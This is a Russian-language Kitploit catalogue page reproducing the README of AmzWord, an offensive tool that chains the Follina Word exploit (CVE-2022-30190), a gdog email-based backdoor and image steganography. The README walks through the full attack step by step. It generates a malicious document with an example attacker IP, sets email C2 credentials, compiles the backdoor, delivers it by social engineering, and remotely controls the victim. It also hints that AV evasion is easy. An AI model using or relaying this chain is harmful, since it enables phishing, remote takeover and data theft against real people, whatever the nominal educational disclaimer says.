Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
AmzWord — Автоматизированная цепочка атак на основе CVE-2022-30190, бэкдора для почтового сервиса 163 и стеганографии изображений. | Kitploit
Инструменты/GitHubGitHub/jump-wang-111/amzword
Инструменты фишингаГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийСтеганографияКомандование и УправлениеСоциальная инженерияОбучение и ОбразованиеБезопасность Электронной Почты
GitHubjump-wang-111/amzword

AmzWord

Автоматизированная цепочка атак на основе CVE-2022-30190, бэкдора для почтового сервиса 163 и стеганографии изображений.

12102 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

AmzWord

автоматизированная цепочка атак на основе CVE-2022-30190, почтового бэкдора 163 и стеганографии изображений

Благодарим следующие репозитории GitHub, код которых мы использовали и модифицировали для интеграции и реализации нашей работы:

  • gdog
  • follina
  • virtual-reality

Русская версия README смотрите здесь

Требования

gdog:

  • Python 2.7
  • модуль PyCrypto
  • модуль WMI
  • модуль Enum34
  • модуль Netifaces

follina:

  • Python 3.x

Использование и процесс атаки

  1. Используйте follina.py для создания вредоносного файла Word и включения HTTP-прослушивания.

    • Вы можете изменить имя по умолчанию и IP-адрес по умолчанию в коде.
    • Вы также можете указать их с помощью --ip и --output.
    • Подробное использование см. в follina. Мы не меняли интерфейс использования.
    • пример: python follina.py --ip 100.100.100.100 --output maldoc.doc
  2. Измените client.py и gdog.py в gdog и заполните следующую информацию:

    root@kitploit:~
    gmail_user = 'your email'
    gmail_pwd = 'your pwd'
    server = "smtp server"
    imap_server = 'imap server'
    
  3. Скомпилируйте client.py в tar.exe и поместите его в /follina/www

  4. Используйте любой метод социальной инженерии, чтобы отправить его цели. Как только жертва откроет Word, tar.exe будет автоматически загружен и выполнен.

  5. Атакующий запускает gdog локально и отправляет команды для управления целевой машиной. См. gdog для использования.

Примечание

  1. Это всего лишь демонстрация реализации цепочки атак. Запущенный exe-файл можно даже найти в диспетчере задач, что упрощает наблюдение за эффектом. Мы не выполняли никаких операций, таких как антивирус, скрытие и повышение привилегий. Конечно, на Windows это несложно, не так ли?
  2. Проект gdog существует уже давно, и мы приложили немало усилий, чтобы заставить его работать. Команды удаленного управления, которые в настоящее время подтверждены, включают: выполнение команд, создание скриншотов, всплывающие окна, выключение, блокировка экрана и передача файлов. Этих функций достаточно для большинства нужд.
  3. Не знаю почему, но, похоже, есть проблема с поиском по SUBJECT в IMAP. Мы не можем найти письма с нужной темой, возвращаемое значение пусто. Мы можем применить другие методы, например, читать все непрочитанные письма, отфильтровывать нужные, а затем помечать остальные как непрочитанные. Это может вызвать проблемы при большом количестве контролируемых пользователей, и это нужно решить.
  4. Этот проект предназначен только для учебных и ознакомительных целей.
Скачать инструмент